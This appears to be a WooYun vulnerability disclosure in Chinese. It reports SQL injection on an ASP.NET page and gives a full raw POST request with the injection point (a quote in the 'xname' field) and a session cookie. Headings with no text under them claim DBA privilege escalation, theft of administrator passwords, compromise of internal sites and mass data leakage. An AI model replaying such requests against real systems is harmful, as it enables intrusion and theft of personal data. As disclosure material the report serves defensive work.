WooYun.org

SQL注入：
POST /Cxys/YsaqsptList.aspx?xid=57904&t=1 HTTP/1.1
Accept: application/x-ms-application, image/jpeg, application/xaml+xml, image/gif, image/pjpeg, application/x-ms-xbap, */*
Referer: http://**.**.**.**/Cxys/YsaqsptList.aspx?xid=57904&t=1
Accept-Language: zh-CN
Content-Type: application/x-www-form-urlencoded
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)
Host: **.**.**.**
Content-Length: 897
Proxy-Connection: Keep-Alive
Pragma: no-cache
Cookie: ASPSESSIONIDQCRQRTRC=FLKCMBEBPBOPELJOBJACEHLN; usernamejb=%B6%FE%BC%B6%D3%C3%BB%A7; uesrname=%CD%F5%B0%AE%D7%E6; suosuchushi2=%BE%D6%C1%EC%B5%BC; suosuchushi=%CA%D0%BE%D6%B5%A5%CE%BB; mcqxian=%B6%FE%BC%B6%D3%C3%BB%A7; userid=217; ASP.NET_SessionId=o3fdbg55tpwpn4neqaofcg55
__EVENTTARGET=&__EVENTARGUMENT=&__LASTFOCUS=&__VIEWSTATE=%2FwEPDwUKMTA5NzY3NTAwMw9kFgICAw9kFhQCBA8QDxYCHgtfIURhdGFCb3VuZGdkEBUEBDIwMTQEMjAxNQQyMDE2Ceivt%2BmAieaLqRUEBDIwMTQEMjAxNQQyMDE2Ceivt%2BmAieaLqRQrAwRnZ2dnZGQCBQ8QDxYCHwBnZBAVDQExATIBMwE0ATUBNgE3ATgBOQIxMAIxMQIxMgnor7fpgInmi6kVDQExATIBMwE0ATUBNgE3ATgBOQIxMAIxMQIxMgnor7fpgInmi6kUKwMNZ2dnZ2dnZ2dnZ2dnZ2RkAgoPFgIeC18hSXRlbUNvdW50ZmQCCw8PFgQeBFRleHQFBummlumhtR4HRW5hYmxlZGhkZAIMDw8WBB8CBQnkuIrkuIDpobUfA2hkZAINDw8WBB8CBQnkuIvkuIDpobUfA2hkZAIODw8WBB8CBQblsL7pobUfA2hkZAIPDw8WAh8CBQExZGQCEA8PFgIfAgUBMWRkAhEPEA8WAh8AZ2QQFQEBMRUBATEUKwMBZxYBZmQYAQUeX19Db250cm9sc1JlcXVpcmVQb3N0QmFja0tleV9fFgMFB0J1dHRvbjEFB0J1dHRvbjIFDEltYWdlQnV0dG9uMYydPIa0XSm9%2FpNJ4U5KHtE2zoDW&HiddenXid=217&hidLast=&xname=a%27&ddlNiandu=%E8%AF%B7%E9%80%89%E6%8B%A9&ddlYearStart=2015&ddlMonthStart=11&ddlXun=%E4%B8%8A%E5%8D%8A%E6%9C%88&DropDownList1=1&Button1.x=35&Button1.y=12
DBA权限提权：

抓取管理员密码：

导致多个内部网站沦陷：

海量信息泄露：